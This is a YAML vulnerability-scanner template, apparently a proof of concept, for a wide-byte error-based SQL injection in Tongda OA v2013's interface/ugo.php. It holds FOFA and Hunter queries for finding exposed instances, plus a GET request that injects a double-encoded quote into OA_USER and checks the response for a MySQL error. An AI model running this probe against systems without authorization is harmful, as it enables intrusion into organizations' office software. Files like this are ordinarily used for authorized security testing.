product: 通达OA
vName: 通达OA v2013 interface-ugo.php宽字节报错注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 通达OA v2013 interface/ugo.php宽字节报错注入
version: ''
note: ''
search:
  FOFA: app="TDXK-通达OA"
  Hunter: app.name="通达 OA"
protocol: http
link: https://xz.aliyun.com/t/10726?time__1311=mq+xB7DQGQD=0QDkDlpIe0=mH45xceZlOloD
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /interface/ugo.php?OA_USER=a%2527
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - You have an error
              - SELECT * from USER where USER_ID=
            logic: and